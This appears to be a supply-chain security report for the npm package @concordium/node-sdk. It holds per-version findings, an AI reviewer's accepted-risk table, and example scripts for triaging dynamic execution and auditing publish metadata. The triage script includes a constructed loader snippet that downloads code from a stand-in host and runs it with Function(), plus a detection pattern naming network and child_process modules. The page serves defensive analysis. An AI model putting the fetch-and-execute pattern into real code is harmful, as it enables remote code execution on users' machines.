@concordium/node-sdk
Helpers for interacting with the Concordium node
Supply chain provenance
Status for the latest visible version.
Without SLSA provenance there is no cryptographic link between this tarball and the public source — the axios compromise (March 2026) relied on exactly this gap.
Maintainers
Accepted risks
Findings the reviewer chose to accept rather than block on.
| Source | Rule | Reason | Accepted by | When |
|---|---|---|---|---|
| source-diff | net-exec-file:grpc/google/protobuf/wrappers_pb.js | AI (source-diff): Auto-generated google-protobuf stub; Function('return this')() is a standard global-object idiom in google-protobuf generated code, not malicious dynamic execution. | ai | |
| source-diff | net-exec-file:grpc/concordium_p2p_rpc_pb.js | AI (source-diff): Auto-generated protobuf JS code from google-protobuf toolchain. Function('return this')() is a standard global-object idiom in protobuf-generated JS, not malicious dynamic execution. | ai | |
| maintainer-change | maintainer-added | AI (maintainer-change): Publisher change concordium-joe → concordium-shj occurred in 2022 and is a documented internal Concordium team transition; concordium-shj has 89 approved packages and 0 rejections. | ai | |
| publish-pattern | new-deps-added | AI (publish-pattern): google-protobuf is a well-known Google library used for gRPC/protobuf communication, appropriate for a blockchain node SDK. | ai | |
| semgrep | semgrep:hex-decode | AI (semgrep): Hex decoding is used for cryptographic address derivation (SHA256 of credential IDs) — expected and legitimate for a blockchain SDK. | ai | |
| source-diff | net-exec-file:lib/grpc/grpc/concordium_p2p_rpc_pb.js | AI (source-diff): File is auto-generated protobuf/gRPC code (// GENERATED CODE -- DO NOT EDIT!). Function('return this')() is a standard Google protobuf-js global-object idiom, not malicious dynamic execution. | ai | |
| provenance | no-provenance | AI (provenance): Provenance attestation is a best-practice enhancement, not a security requirement. Package has legitimate repo and publisher history. | ai | |
| publish-pattern | rapid-publish | AI (publish-pattern): Rapid publishes are routine for patch releases; the absence of material changes in this version supports benign intent. | ai | |
| dependencies | unvetted-dep:@concordium/common-sdk | AI (dependencies): Sibling package from the same Concordium organization; expected dependency for this SDK across all versions. | ai | |
| dependencies | unvetted-dep:@protobuf-ts/grpc-transport | AI (dependencies): Well-known protobuf gRPC transport library; expected dependency for a gRPC-based blockchain SDK. | ai | |
| provenance | publisher-changed | AI (provenance): Publisher transition occurred Oct 2023; new publisher has maintained clean record (26 approved packages) since then. | ai | |
| dependencies | unvetted-dep:google-protobuf | AI (dependencies): google-protobuf is standard for gRPC; essential for this SDK's core functionality. | ai | |
| semgrep | semgrep:base64-decode | AI (semgrep): Base64 decoding in wallet crypto module is legitimate key derivation using PBKDF2; standard for cryptographic wallet implementations. | ai | |
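The three net-exec-file rows above all come down to one triage question: is the flagged `Function(...)` call the google-protobuf global-object idiom, `Function('return this')()`, whose argument is a fixed string literal, or is the argument built at run time (and, worse, from something fetched over the network)? The following is an added example written for this page, not code from @concordium/node-sdk or from the scanner that produced the findings. Both source snippets are constructed: one mimics the generated protobuf stub, the other the fetch-then-execute shape the rule is meant to catch. The list of network-capable APIs and the verdict wording are assumptions of the example.

```javascript
// Added example, not code from @concordium/node-sdk or its scanner. Triage for
// the net-exec-file rule: separate the google-protobuf global-object idiom,
// Function('return this')(), from dynamic code built at run time, and only
// escalate when such dynamic code sits next to network access.
// Both source snippets are constructed for illustration.

const GENERATED_STUB = `
// GENERATED CODE -- DO NOT EDIT!
var global = (function() {
  return this || window || global || self || Function('return this')();
}).call(null);
goog.exportSymbol('proto.google.protobuf.BoolValue', null, global);
`;

const LOADER_LIKE = `
const https = require('https');
https.get('https://example.invalid/stage2', (res) => {
  let body = '';
  res.on('data', (chunk) => { body += chunk; });
  res.on('end', () => Function(Buffer.from(body, 'base64').toString())());
});
`;

// Network-capable APIs worth flagging in an npm package (assumed list).
const NETWORK_API = /\brequire\s*\(\s*['"](?:https?|net|tls|dgram|child_process)['"]\s*\)|\bfetch\s*\(|\bXMLHttpRequest\b|\bWebSocket\b/;

// Returns every Function()/eval() call site with its string-literal argument, if any.
function findDynamicExec(source) {
  const callSite = /\b(?:new\s+)?Function\s*\(|\beval\s*\(/g;
  const hits = [];
  let m;
  while ((m = callSite.exec(source)) !== null) {
    const rest = source.slice(m.index + m[0].length);
    // A single string literal as the only argument, e.g. Function('return this')
    const lit = /^\s*(['"`])((?:(?!\1)[^\\])*)\1\s*\)/.exec(rest);
    const literal = lit ? lit[2] : null;
    const idiom = literal !== null && literal.trim() === 'return this';
    hits.push({ call: m[0].trim(), literal, kind: idiom ? 'global-object-idiom' : 'dynamic-code' });
  }
  return hits;
}

// Verdict for one file: the idiom alone is accepted, dynamic code is reviewed,
// dynamic code plus network access is blocked.
function triageFile(source) {
  const hits = findDynamicExec(source);
  const dynamic = hits.filter((h) => h.kind === 'dynamic-code');
  const network = NETWORK_API.test(source);
  const generated = /GENERATED CODE -- DO NOT EDIT/.test(source);
  let verdict;
  if (dynamic.length > 0 && network) verdict = 'block: network access plus dynamic code';
  else if (dynamic.length > 0) verdict = 'review: dynamic code without network access';
  else if (hits.length > 0) verdict = 'accept: only the Function("return this")() idiom';
  else verdict = 'accept: no dynamic execution';
  return { generated, network, hits, verdict };
}

for (const [name, src] of Object.entries({ GENERATED_STUB, LOADER_LIKE })) {
  const r = triageFile(src);
  console.log(`${name}: ${r.verdict} (generated=${r.generated}, network=${r.network})`);
}
```

The `GENERATED CODE -- DO NOT EDIT` marker is recorded but deliberately not trusted on its own: a loader can carry that comment too, so the decision rests on the argument to `Function`, not on the header.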
Versions (showing 37 of 37)
| Version | Deps | Published |
|---|---|---|
| 9.5.3 | 5 / 21 | |
| 9.5.2 | 5 / 21 | |
| 9.5.1 | 5 / 21 | |
| 9.4.0 | 5 / 21 | |
| 9.3.0 | 5 / 21 | |
| 9.2.0 | 5 / 21 | |
| 9.1.1 | 5 / 21 | |
| 9.1.0 | 5 / 21 | |
| 9.0.0 | 5 / 21 | |
| 8.0.0 | 5 / 21 | |
| 7.0.0 | 5 / 21 | |
| 6.4.0 | 5 / 21 | |
| 6.3.0 | 5 / 21 | |
| 6.2.0 | 5 / 21 | |
| 6.1.0 | 4 / 18 | |
| 6.0.0 | 4 / 18 | |
| 5.0.0 | 4 / 18 | |
| 4.0.0 | 4 / 18 | |
| 3.0.2 | 4 / 18 | |
| 3.0.1 | 4 / 18 | |
| 3.0.0 | 4 / 18 | |
| 2.1.1 | 4 / 18 | |
| 2.1.0 | 4 / 18 | |
| 2.0.2 | 4 / 18 | |
| 2.0.0 | 3 / 18 | |
| 1.1.0 | 5 / 19 | |
| 1.0.0 | 5 / 19 | |
| 0.7.3 | 5 / 19 | |
| 0.7.2 | 4 / 19 | |
| 0.7.1 | 4 / 19 | |
| 0.6.0 | 4 / 19 | |
| 0.5.1 | 4 / 19 | |
| 0.4.0 | 4 / 17 | |
| 0.3.0 | 4 / 17 | |
| 0.2.5 | 4 / 17 | |
| 0.2.4 | 4 / 17 | |
| 0.1.9 | 4 / 17 |
v9.5.3
1 finding: [Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v9.5.2
2 findings: Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
[Accepted risk] This version was published by a different npm account than previous versions on 2023-10-20. This could indicate a legitimate maintainer transition or an account compromise.
v9.5.1
3 findings: This version has no gitHead field linking it to a source commit, but previous versions did. This suggests the publish environment changed. Published by: soerenbz.
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
[Accepted risk] This version was published by a different npm account than previous versions on 2023-10-19. This could indicate a legitimate maintainer transition or an account compromise.
v9.4.0
1 finding: [Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v9.3.0
1 finding: [Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v9.2.0
1 finding: [Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v9.1.1
1 finding: [Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v9.1.0
1 finding: [Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v9.0.0
1 finding: [Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v8.0.0
2 findings: [Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
[Accepted risk] This version was published by a different npm account than previous versions on 2023-06-27. This could indicate a legitimate maintainer transition or an account compromise.
v7.0.0
2 findings: Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v6.4.0
2 findings: Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v6.3.0
1 finding: [Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v6.2.0
1 finding: [Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v6.1.0
1 finding: [Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v6.0.0
2 findings: Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v5.0.0
1 finding: [Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v4.0.0
2 findings: [Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
[Accepted risk] This version was published by a different npm account than previous versions on 2022-08-26. This could indicate a legitimate maintainer transition or an account compromise.
v3.0.2
2 findings: [Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
[Accepted risk] This version was published by a different npm account than previous versions on 2022-07-26. This could indicate a legitimate maintainer transition or an account compromise.
v3.0.1
2 findings: [Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
[Accepted risk] This version was published by a different npm account than previous versions on 2022-07-26. This could indicate a legitimate maintainer transition or an account compromise.
v3.0.0
2 findings: [Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
[Accepted risk] This version was published by a different npm account than previous versions on 2022-07-25. This could indicate a legitimate maintainer transition or an account compromise.
v2.1.1
3 findings: Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
[Accepted risk] This version was published by a different npm account than previous versions on 2022-07-08. This could indicate a legitimate maintainer transition or an account compromise.
v2.1.0
2 findings: [Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
[Accepted risk] This version was published by a different npm account than previous versions on 2022-07-07. This could indicate a legitimate maintainer transition or an account compromise.
v2.0.2
1 finding: [Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v2.0.0
1 finding: [Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.1.0
1 finding: [Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.0.0
1 finding: [Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.7.3
2 findings: [Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
[Accepted risk] This version was published by a different npm account than previous versions on 2022-05-06. This could indicate a legitimate maintainer transition or an account compromise.
v0.7.2
2 findings: [Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
[Accepted risk] This version was published by a different npm account than previous versions on 2022-05-05. This could indicate a legitimate maintainer transition or an account compromise.
v0.7.1
3 findings: Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
[Accepted risk] This version was published by a different npm account than previous versions on 2022-03-09. This could indicate a legitimate maintainer transition or an account compromise.
v0.6.0
3 findings: Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
[Accepted risk] This version was published by a different npm account than previous versions on 2022-02-10. This could indicate a legitimate maintainer transition or an account compromise.
v0.5.1
1 finding: [Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.0
1 finding: [Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.3.0
1 finding: [Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.2.5
1 finding: [Accepted risk] Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v0.2.4
1 finding: [Accepted risk] Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
v0.1.9
1 finding: [Accepted risk] Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
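The provenance, publisher-changed, missing-gitHead and rapid-publish findings listed per version above, and the corresponding rows in the accepted-risks table, are all derivable from the npm registry's packument for the package. The following is an added example written for this page, not code from @concordium/node-sdk or from the scanner that produced these findings. Field names follow the public registry document (`versions[v].dist.attestations`, `versions[v].gitHead`, `versions[v]._npmUser.name`, `time[v]`); the package name, versions, accounts, commit hashes and timestamps in the sample are constructed, and the one-hour "rapid publish" threshold is an assumption.

```javascript
// Added example, not code from @concordium/node-sdk or its scanner. Reproduces
// the page's publish-metadata findings (no-provenance, publisher-changed,
// missing gitHead, rapid-publish) from an npm packument. Field names follow the
// public registry document: versions[v].dist.attestations, versions[v].gitHead,
// versions[v]._npmUser.name and time[v]. The package, versions, accounts and
// timestamps below are constructed, not taken from the real package.

const SAMPLE_PACKUMENT = {
  name: 'example-sdk',
  time: {
    '1.0.0': '2022-01-10T10:00:00.000Z',
    '1.1.0': '2022-03-01T12:00:00.000Z',
    '1.1.1': '2022-03-01T12:20:00.000Z',
    '2.0.0': '2023-10-19T09:00:00.000Z',
    '2.0.1': '2023-11-01T09:00:00.000Z',
  },
  versions: {
    '1.0.0': { gitHead: '1111111111111111111111111111111111111111', _npmUser: { name: 'maintainer-a' }, dist: {} },
    '1.1.0': { gitHead: '2222222222222222222222222222222222222222', _npmUser: { name: 'maintainer-a' }, dist: {} },
    '1.1.1': { gitHead: '3333333333333333333333333333333333333333', _npmUser: { name: 'maintainer-a' }, dist: {} },
    // Different account, and the publish environment no longer records gitHead.
    '2.0.0': { _npmUser: { name: 'maintainer-b' }, dist: {} },
    // Published from CI with a Sigstore/SLSA attestation attached by the registry.
    '2.0.1': {
      gitHead: '4444444444444444444444444444444444444444',
      _npmUser: { name: 'maintainer-b' },
      dist: {
        attestations: {
          url: 'https://registry.npmjs.org/-/npm/v1/attestations/example-sdk@2.0.1',
          provenance: { predicateType: 'https://slsa.dev/provenance/v1' },
        },
      },
    },
  },
};

// Assumption: two publishes less than an hour apart count as "rapid".
const RAPID_PUBLISH_MS = 60 * 60 * 1000;

function hasProvenance(meta) {
  return Boolean(meta.dist && meta.dist.attestations && meta.dist.attestations.provenance);
}

function auditPackument(pkg, rapidMs = RAPID_PUBLISH_MS) {
  // Walk versions in publish order, not semver order: every check below is
  // about what changed between one publish and the next.
  const order = Object.keys(pkg.versions)
    .filter((v) => pkg.time[v])
    .sort((a, b) => Date.parse(pkg.time[a]) - Date.parse(pkg.time[b]));
  const findings = [];
  let prev = null;
  for (const v of order) {
    const meta = pkg.versions[v];
    const publisher = meta._npmUser ? meta._npmUser.name : null;
    const day = pkg.time[v].slice(0, 10);
    if (!hasProvenance(meta)) {
      findings.push({ version: v, rule: 'no-provenance', detail: 'no dist.attestations.provenance on the registry record' });
    }
    if (prev) {
      const pm = pkg.versions[prev];
      const prevPublisher = pm._npmUser ? pm._npmUser.name : null;
      if (publisher !== prevPublisher) {
        findings.push({ version: v, rule: 'publisher-changed', detail: `${prevPublisher} -> ${publisher} on ${day}` });
      }
      if (pm.gitHead && !meta.gitHead) {
        findings.push({ version: v, rule: 'no-gitHead', detail: `gitHead present on ${prev}, absent here; publish environment changed` });
      }
      const deltaMs = Date.parse(pkg.time[v]) - Date.parse(pkg.time[prev]);
      if (deltaMs < rapidMs) {
        findings.push({ version: v, rule: 'rapid-publish', detail: `${Math.round(deltaMs / 60000)} min after ${prev}` });
      }
    }
    prev = v;
  }
  return findings;
}

// Sorted rule names raised against one version, for reporting and tests.
function rulesFor(findings, version) {
  return findings.filter((f) => f.version === version).map((f) => f.rule).sort();
}

for (const f of auditPackument(SAMPLE_PACKUMENT)) {
  console.log(`${SAMPLE_PACKUMENT.name}@${f.version} ${f.rule}: ${f.detail}`);
}
```

To run the same checks against the real package, fetch the packument from `https://registry.npmjs.org/@concordium%2Fnode-sdk` and pass the parsed JSON to `auditPackument`. Note that a publisher change and a dropped `gitHead` in the same publish, as in the constructed 2.0.0 above, is exactly the combination that deserves a human look rather than an automatic accept: each alone has a benign explanation, together they say the package was built somewhere new by someone new. For dependencies already installed, `npm audit signatures` verifies registry signatures and, where present, provenance attestations without any custom code.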